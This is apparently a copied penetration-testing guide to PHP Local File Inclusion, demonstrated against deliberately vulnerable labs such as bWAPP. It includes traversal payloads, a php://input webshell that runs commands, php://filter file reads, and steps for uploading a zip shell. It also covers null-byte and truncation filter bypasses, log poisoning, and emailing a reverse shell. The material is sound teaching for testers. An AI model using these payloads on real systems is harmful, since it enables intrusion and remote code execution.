Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques
Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques
Jan 04, 2017, Version 1.0
Contents
What is a Local File Inclusion (LFI) vulnerability?
Example of Vulnerable Code
Identifying LFI Vulnerabilities within Web Applications
PHP Wrappers
PHP Expect Wrapper
PHP file:// Wrapper
PHP php://filter
PHP ZIP Wrapper LFI
LFI via /proc/self/environ
Useful Shells
Null Byte Technique
Truncation LFI Bypass
Log File Contamination
Apache / Nginx
Email a Reverse Shell
References
What is a Local File Inclusion (LFI) vulnerability?
Local File Inclusion (LFI) allows an attacker to include files on a server through the web browser.
This vulnerability exists when a web application includes a file without correctly sanitising the
input, allowing and attacker to manipulate the input and inject path traversal characters and
include other files from the web server.
Example of Vulnerable Code
The following is an example of PHP code vulnerable to local file inclusion.
$file = $_GET['file'];
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
Identifying LFI Vulnerabilities within Web Applications
LFI vulnerabilities are easy to identify and exploit. Any script that includes a file from a web
server is a good candidate for further LFI testing, for example:
/script.php?page=index.html
A penetration tester would attempt to exploit this vulnerability by manipulating the file location
parameter, such as:
/script.php?page=../../../../../../../../etc/passwd
The above is an effort to display the contents of the /etc/passwd file on a UNIX / Linux based
system.
Below is an example of a successful exploitation of an LFI vulnerability on a web application:
/bWAPP/rlfi.php?language=../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:119::/var/run/dbus:/bin/false
avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
neo:x:1001:1001::/home/neo:/bin/sh
alice:x:1002:1002::/home/alice:/bin/sh
thor:x:1003:1003::/home/thor:/bin/sh
wolverine:x:1004:1004::/home/wolverine:/bin/sh
johnny:x:1005:1005::/home/johnny:/bin/sh
selene:x:1006:1006::/home/selene:/bin/sh
postfix:x:117:129::/var/spool/postfix:/bin/false
proftpd:x:118:65534::/var/run/proftpd:/bin/false
ftp:x:119:65534::/home/ftp:/bin/false
snmp:x:120:65534::/var/lib/snmp:/bin/false
ntp:x:121:131::/home/ntp:/bin/false
PHP Wrappers
PHP has a number of wrappers that can often be abused to bypass various input filters.
PHP Expect Wrapper
PHP expect:// allows execution of system commands, unfortunately the expect PHP module is
not enabled by default.
Example:
php?page=expect://ls
PHP file:// Wrapper
The payload is sent in a POST request to the server such as:
/fi/?page=php://input&cmd=ls
Example using php://input against bWAPP:
Request:
POST
/bWAPP/rlfi.php?language=php://input&cmd=id
<?php echo system($_GET['cmd']);
Response:
uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
PHP php://filter
php://filter allows a pen tester to include local files and base64 encodes the output. Therefore,
any base64 output will need to be decoded to reveal the contents.
An example using bWAPP:
Request:
/bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=/etc/passwd
Response:
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbGlidXVpZDp4OjEwMDoxMDE6Oi92YXIvbGliL2xpYnV1aWQ6L2Jpbi9zaApkaGNwOng6MTAxOjEwMjo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3lzbG9nOng6MTAyOjEwMzo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKa2xvZzp4OjEwMzoxMDQ6Oi9ob21lL2tsb2c6L2Jpbi9mYWxzZQpocGxpcDp4OjEwNDo3OkhQTElQIHN5c3RlbSB1c2VyLCwsOi92YXIvcnVuL2hwbGlwOi9iaW4vZmFsc2UKYXZhaGktYXV0b2lwZDp4OjEwNToxMTM6QXZhaGkgYXV0b2lwIGRhZW1vbiwsLDovdmFyL2xpYi9hdmFoaS1hdXRvaXBkOi9iaW4vZmFsc2UKZ2RtOng6MTA2OjExNDpHbm9tZSBEaXNwbGF5IE1hbmFnZXI6L3Zhci9saWIvZ2RtOi9iaW4vZmFsc2UKcHVsc2U6eDoxMDc6MTE2OlB1bHNlQXVkaW8gZGFlbW9uLCwsOi92YXIvcnVuL3B1bHNlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwODoxMTk6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQphdmFoaTp4OjEwOToxMjA6QXZhaGkgbUROUyBkYWVtb24sLCw6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKcG9sa2l0dXNlcjp4OjExMDoxMjI6UG9saWN5S2l0LCwsOi92YXIvcnVuL1BvbGljeUtpdDovYmluL2ZhbHNlCmhhbGRhZW1vbjp4OjExMToxMjM6SGFyZHdhcmUgYWJzdHJhY3Rpb24gbGF5ZXIsLCw6L3Zhci9ydW4vaGFsZDovYmluL2ZhbHNlCmJlZTp4OjEwMDA6MTAwMDpiZWUsLCw6L2hvbWUvYmVlOi9iaW4vYmFzaApteXNxbDp4OjExMjoxMjQ6TXlTUUwgU2VydmVyLCwsOi92YXIvbGliL215c3FsOi9iaW4vZmFsc2UKc3NoZDp4OjExMzo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpkb3ZlY290Ong6MTE0OjEyNjpEb3ZlY290IG1haWwgc2VydmVyLCwsOi91c3IvbGliL2RvdmVjb3Q6L2Jpbi9mYWxzZQpzbW10YTp4OjExNToxMjc6TWFpbCBUcmFuc2ZlciBBZ2VudCwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCnNtbXNwOng6MTE2OjEyODpNYWlsIFN1Ym1pc3Npb24gUHJvZ3JhbSwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCm5lbzp4OjEwMDE6MTAwMTo6L2hvbWUvbmVvOi9iaW4vc2gKYWxpY2U6eDoxMDAyOjEwMDI6Oi9ob21lL2FsaWNlOi9iaW4vc2gKdGhvcjp4OjEwMDM6MTAwMzo6L2hvbWUvdGhvcjovYmluL3NoCndvbHZlcmluZTp4OjEwMDQ6MTAwNDo6L2hvbWUvd29sdmVyaW5lOi9iaW4vc2gKam9obm55Ong6MTAwNToxMDA1OjovaG9tZS9qb2hubnk6L2Jpbi9zaApzZWxlbmU6eDoxMDA2OjEwMDY6Oi9ob21lL3NlbGVuZTovYmluL3NoCnBvc3RmaXg6eDoxMTc6MTI5OjovdmFyL3Nwb29sL3Bvc3RmaXg6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTE4OjY1NTM0OjovdmFyL3J1bi9wcm9mdHBkOi9iaW4vZmFsc2UKZnRwOng6MTE5OjY1NTM0OjovaG9tZS9mdHA6L2Jpbi9mYWxzZQpzbm1wOng6MTIwOjY1NTM0OjovdmFyL2xpYi9zbm1wOi9iaW4vZmFsc2UKbnRwOng6MTIxOjEzMTo6L2hvbWUvbnRwOi9iaW4vZmFsc2UK
Base64 decoding the string provides the /etc/passwd file:
bee@bee-box:~$ echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L2Jpbi9zaAptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovYmluL3NoCmxwOng6Nzo3OmxwOi92YXIvc3Bvb2wvbHBkOi9iaW4vc2gKbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovYmluL3NoCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L2Jpbi9zaAp1dWNwOng6MTA6MTA6dXVjcDovdmFyL3Nwb29sL3V1Y3A6L2Jpbi9zaApwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L2Jpbi9zaAp3d3ctZGF0YTp4OjMzOjMzOnd3dy1kYXRhOi92YXIvd3d3Oi9iaW4vc2gKYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovYmluL3NoCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L2Jpbi9zaAppcmM6eDozOTozOTppcmNkOi92YXIvcnVuL2lyY2Q6L2Jpbi9zaApnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L2Jpbi9zaApub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi9iaW4vc2gKbGlidXVpZDp4OjEwMDoxMDE6Oi92YXIvbGliL2xpYnV1aWQ6L2Jpbi9zaApkaGNwOng6MTAxOjEwMjo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3lzbG9nOng6MTAyOjEwMzo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKa2xvZzp4OjEwMzoxMDQ6Oi9ob21lL2tsb2c6L2Jpbi9mYWxzZQpocGxpcDp4OjEwNDo3OkhQTElQIHN5c3RlbSB1c2VyLCwsOi92YXIvcnVuL2hwbGlwOi9iaW4vZmFsc2UKYXZhaGktYXV0b2lwZDp4OjEwNToxMTM6QXZhaGkgYXV0b2lwIGRhZW1vbiwsLDovdmFyL2xpYi9hdmFoaS1hdXRvaXBkOi9iaW4vZmFsc2UKZ2RtOng6MTA2OjExNDpHbm9tZSBEaXNwbGF5IE1hbmFnZXI6L3Zhci9saWIvZ2RtOi9iaW4vZmFsc2UKcHVsc2U6eDoxMDc6MTE2OlB1bHNlQXVkaW8gZGFlbW9uLCwsOi92YXIvcnVuL3B1bHNlOi9iaW4vZmFsc2UKbWVzc2FnZWJ1czp4OjEwODoxMTk6Oi92YXIvcnVuL2RidXM6L2Jpbi9mYWxzZQphdmFoaTp4OjEwOToxMjA6QXZhaGkgbUROUyBkYWVtb24sLCw6L3Zhci9ydW4vYXZhaGktZGFlbW9uOi9iaW4vZmFsc2UKcG9sa2l0dXNlcjp4OjExMDoxMjI6UG9saWN5S2l0LCwsOi92YXIvcnVuL1BvbGljeUtpdDovYmluL2ZhbHNlCmhhbGRhZW1vbjp4OjExMToxMjM6SGFyZHdhcmUgYWJzdHJhY3Rpb24gbGF5ZXIsLCw6L3Zhci9ydW4vaGFsZDovYmluL2ZhbHNlCmJlZTp4OjEwMDA6MTAwMDpiZWUsLCw6L2hvbWUvYmVlOi9iaW4vYmFzaApteXNxbDp4OjExMjoxMjQ6TXlTUUwgU2VydmVyLCwsOi92YXIvbGliL215c3FsOi9iaW4vZmFsc2UKc3NoZDp4OjExMzo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpkb3ZlY290Ong6MTE0OjEyNjpEb3ZlY290IG1haWwgc2VydmVyLCwsOi91c3IvbGliL2RvdmVjb3Q6L2Jpbi9mYWxzZQpzbW10YTp4OjExNToxMjc6TWFpbCBUcmFuc2ZlciBBZ2VudCwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCnNtbXNwOng6MTE2OjEyODpNYWlsIFN1Ym1pc3Npb24gUHJvZ3JhbSwsLDovdmFyL2xpYi9zZW5kbWFpbDovYmluL2ZhbHNlCm5lbzp4OjEwMDE6MTAwMTo6L2hvbWUvbmVvOi9iaW4vc2gKYWxpY2U6eDoxMDAyOjEwMDI6Oi9ob21lL2FsaWNlOi9iaW4vc2gKdGhvcjp4OjEwMDM6MTAwMzo6L2hvbWUvdGhvcjovYmluL3NoCndvbHZlcmluZTp4OjEwMDQ6MTAwNDo6L2hvbWUvd29sdmVyaW5lOi9iaW4vc2gKam9obm55Ong6MTAwNToxMDA1OjovaG9tZS9qb2hubnk6L2Jpbi9zaApzZWxlbmU6eDoxMDA2OjEwMDY6Oi9ob21lL3NlbGVuZTovYmluL3NoCnBvc3RmaXg6eDoxMTc6MTI5OjovdmFyL3Nwb29sL3Bvc3RmaXg6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTE4OjY1NTM0OjovdmFyL3J1bi9wcm9mdHBkOi9iaW4vZmFsc2UKZnRwOng6MTE5OjY1NTM0OjovaG9tZS9mdHA6L2Jpbi9mYWxzZQpzbm1wOng6MTIwOjY1NTM0OjovdmFyL2xpYi9zbm1wOi9iaW4vZmFsc2UKbnRwOng6MTIxOjEzMTo6L2hvbWUvbnRwOi9iaW4vZmFsc2UK' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:119::/var/run/dbus:/bin/false
avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
neo:x:1001:1001::/home/neo:/bin/sh
alice:x:1002:1002::/home/alice:/bin/sh
thor:x:1003:1003::/home/thor:/bin/sh
wolverine:x:1004:1004::/home/wolverine:/bin/sh
johnny:x:1005:1005::/home/johnny:/bin/sh
selene:x:1006:1006::/home/selene:/bin/sh
postfix:x:117:129::/var/spool/postfix:/bin/false
proftpd:x:118:65534::/var/run/proftpd:/bin/false
ftp:x:119:65534::/home/ftp:/bin/false
snmp:x:120:65534::/var/lib/snmp:/bin/false
ntp:x:121:131::/home/ntp:/bin/false
php://filter can also be used without base64 encoding the output using:
?page=php://filter/resource=/etc/passwd
bWAPP:
/bWAPP/rlfi.php?language=php://filter/resource=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
hplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
pulse:x:107:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:119::/var/run/dbus:/bin/false
avahi:x:109:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
polkituser:x:110:122:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:111:123:Hardware abstraction layer,,,:/var/run/hald:/bin/false
bee:x:1000:1000:bee,,,:/home/bee:/bin/bash
mysql:x:112:124:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
dovecot:x:114:126:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
smmta:x:115:127:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:128:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
neo:x:1001:1001::/home/neo:/bin/sh
alice:x:1002:1002::/home/alice:/bin/sh
thor:x:1003:1003::/home/thor:/bin/sh
wolverine:x:1004:1004::/home/wolverine:/bin/sh
johnny:x:1005:1005::/home/johnny:/bin/sh
selene:x:1006:1006::/home/selene:/bin/sh
postfix:x:117:129::/var/spool/postfix:/bin/false
proftpd:x:118:65534::/var/run/proftpd:/bin/false
ftp:x:119:65534::/home/ftp:/bin/false
snmp:x:120:65534::/var/lib/snmp:/bin/false
ntp:x:121:131::/home/ntp:/bin/false
PHP ZIP Wrapper LFI
The zip wrapper processes uploaded .zip files server side allowing a penetration tester to upload
a zip file using a vulnerable file upload function and leverage he zip filter via an LFI to execute. A
typical attack example would look like:
1. Create a PHP reverse shell
2. Compress to a .zip file
3. Upload the compressed shell payload to the server
4. Use the zip wrapper to extract the payload using:
php?page=zip://path/to/file.zip%23shell
5. The above will extract the zip file to shell, if the server does not append .php rename it to
shell.php instead
If the file upload function does not allow zip files to be uploaded, attempts can be made to bypass
the file upload function (see: OWASP file upload testing document).
bWAPP /bWAPP/rlfi.php:
$language = $_GET["language"] . ".php";
Useful:
/bWAPP/rlfi.php?language=zip://./images/hehe.zip%23hehe
/bWAPP/rlfi.php?language=zip:///var/www/bWAPP/images/hehe.zip%23hehe
zip wrapper:
hehe.zip-->hehe.php <?php phpinfo();
LFI via /proc/self/environ
If it’s possible to include /proc/self/environ via a local file inclusion vulnerability, then introducing
source code via the User Agent header is a possible vector. Once code has been injected into the
User Agent header a local file inclusion vulnerability can be leveraged to execute
/proc/self/environ and reload the environment variables, executing your reverse shell.
Useful Shells
Useful tiny PHP back doors for the above techniques:
<? system('uname -a');?>
Null Byte Technique
Null byte injection bypasses application filtering within web applications by adding URL encoded
“Null bytes” such as %00. Typically, this bypasses basic web application blacklist filters by adding
additional null characters that are then allowed or not processed by the backend web application.
Some practical examples of null byte injection for LFI:
/bWAPP/rlfi.php?language=/etc/passwd%00
/bWAPP/rlfi.php?language=/etc/passwd%2500
Truncation LFI Bypass
Truncation is another blacklist bypass technique. By injecting long parameter into the vulnerable
file inclusion mechanism, the web application may “cut it off” (truncate) the input parameter,
which may bypass the input filter.
LFI truncation examples:
/bWAPP/rlfi.php?language=/etc/passwd…………………………………………………………………………….
/bWAPP/rlfi.php?language=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/bWAPP/rlfi.php?language=/etc/passwd/../../../../../../../../../../../../../../../../../..
Log File Contamination
Log file contamination is the process of injecting source code into log files on the target system.
This is achieved by introducing source code via other exposed services on the target system
which the target operating system / service will store in log files. For example, injecting PHP
reverse shell code into a URL, causing syslog to create an entry in the apache access log for a
404 page not found entry. The apache log file would then be parsed using a previously discovered
file inclusion vulnerability, executing the injected PHP reverse shell.
After introducing source code to the target systems log file(s) the next step is identifying the
location of the log file. During the recon and discovery stage of penetration testing the web server
and likely the target operating system would have been identified, a good starting point would be
looking up the default log paths for the identified operating system and web server (if they are
not already known by the consultant). FuzzDB’s Burp LFI payload lists can be used in conjunction
with Burp intruder to quickly identify valid log file locations on the target system.
Some commonly exposed services on a Linux / UNIX systems are listed below:
Apache / Nginx
Inject code into the web server access or error logs using netcat, after successful injection parse
the server log file location by exploiting the previously discovered LFI vulnerability. If the web
server access / error logs are long, it may take some time execute your injected code.
Email a Reverse Shell
If the target machine relays mail either directly or via another machine on the network and stores mail
for the user www-data (or the apache user) on the system then it’s possible to email a reverse shell to the target. If no MX records exist for the domain but SMTP is exposed it’s possible to connect to the target mail server and send mail to the www-data / apache user. Mail is sent to the user running apache such as www-data to ensure file system permissions will allow read access the file /var/spool/mail/www-data containing the injected PHP reverse shell code.
First enumerate the target system using a list of known UNIX / Linux account names:
The following screenshot shows the process of sending email via telnet to the www-data user:
Resulting in a reverse shell connecting back to a running netcat listener:
References
Information sources used within this document:
https://highon.coffee/blog/lfi-cheat-sheet/
https://www.owasp.org/index.php/PHP_File_Inclusion
DVWA (used for LFI examples):
http://www.dvwa.co.uk/
Web Application Penetration Testing Local File Inclusion (LFI) Testing Techniques的更多相关文章
- [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
# Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...
- WEB APPLICATION PENETRATION TESTING NOTES
此文转载 XXE VALID USE CASE This is a nonmalicious example of how external entities are used: <?xml v ...
- LFI (local file inclusion vulnerability)本地文件包含
代码实例: <?php $file = $_GET['file']; if(isset($file)) { include("pages/$file"); } else { ...
- Web Application Vulnerablities
1. File inclusion berfoe start this caption i make a conclusion for install third-part as follow I ...
- 文件包含漏洞File Inclusion
文件包含漏洞 目录遍历漏洞在国内外有许多不同的叫法,也可以叫做信息泄露漏洞.非授权文件包含漏洞等. 文件包含分类 LFI:本地文件包含(Local File Inclusion) RFI:远程文件包含 ...
- DVWA File Inclusion 通关教程
File Inclusion 介绍File Inclusion,即文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数:include(),req ...
- Performance testing of web application
Testing the performance of web application is easy . It's easy to design unrealistic scenario . Easy ...
- You may receive an exception when you browse a .NET Framework 2.0 ASP.NET Web application
SYMPTOMS When you browse a Microsoft .NET Framework 2.0 ASP.NET Web application, you may receive one ...
- [Windows Azure] Adding Sign-On to Your Web Application Using Windows Azure AD
Adding Sign-On to Your Web Application Using Windows Azure AD 14 out of 19 rated this helpful - Rate ...
随机推荐
- 关于MySQL数据库优化的部分整理
在之前我写过一篇关于这个方面的文章 <[原创]为什么使用数据索引能提高效率?(本文针对mysql进行概述)(更新)> 这次,主要侧重点讲下两种常用存储引擎. 我们一般从两个方面进行MySQ ...
- C++01.类的引入
1.假设我们要输出张三,李四两个人的基本信息,包括姓名,年龄,可以用以下的C程序实现: eg: #include <stdio.h> int main(int argc,char **ar ...
- 地图中插入表格——ArcMap篇
在制作专题图的过程中,不但要有地理要素表示空间位置,经常还要在图的周围制作一些表格数据.这里对ArcMap中的插入方法进行总结. 方法一:插入对象 利用菜单中的"插入"-" ...
- SharePoint2016如何使用策略进行文档归档
前言 最近项目用户需要提供文档按照日期或标题关键字进行对应的文档归档操作,为了实施这个操作,需要准备2个文档库,我这里准备了如下文档库: 1. 测试文档库:在测试文档中上传几篇文档,如下图: 2. 我 ...
- Android核心组件 Activity组件
1.Activity简介 四大组件之一的Activity组件,在应用中一个Activity可以用来表示一个界面,中文意思也可以理解为"活动",即一个活动开始,代表Activity组 ...
- 用collectionview实现瀑布流-转(后面附demo,供参考)
算法总体思路 先说一下总体上的思路.既然图片的大小.位置各不一样,我们很自然地会想到需要算出每个item的frame,然后把这些frame赋值给当前item的UICollectionViewLayou ...
- 解决apache启动错误"httpd:Could not reliably determine..."
启动apache遇到错误:httpd: Could not reliably determine the server's fully qualified domain name [root@serv ...
- 关于WCF测试时出现无法从***获取元数据问题
在我们已经创建成功一个WCF服务后,通过本机localhost访问和测试均没有任何问题.但是寄宿在IIS/其他平台下时便会出现以下的错误信息 1.使用WCF Test Client错误 2.通过C#引 ...
- PowerDesigner从SqlServer数据库中导入实体模型
PowerDesigner从SqlServer数据库中导入实体模型 时间 2013-06-28 10:26:34 CSDN博客 原文 http://blog.csdn.net/sxycxwb/art ...
- [Erlang 0113] Elixir 编译流程梳理
注意:目前Elixir版本还不稳定,代码调整较大,本文随时失效 之前简单演示过如何从elixir ex代码生成并运行Erlang代码,下面仔细梳理一遍elixir文件的编译过程,书接上文,从 ...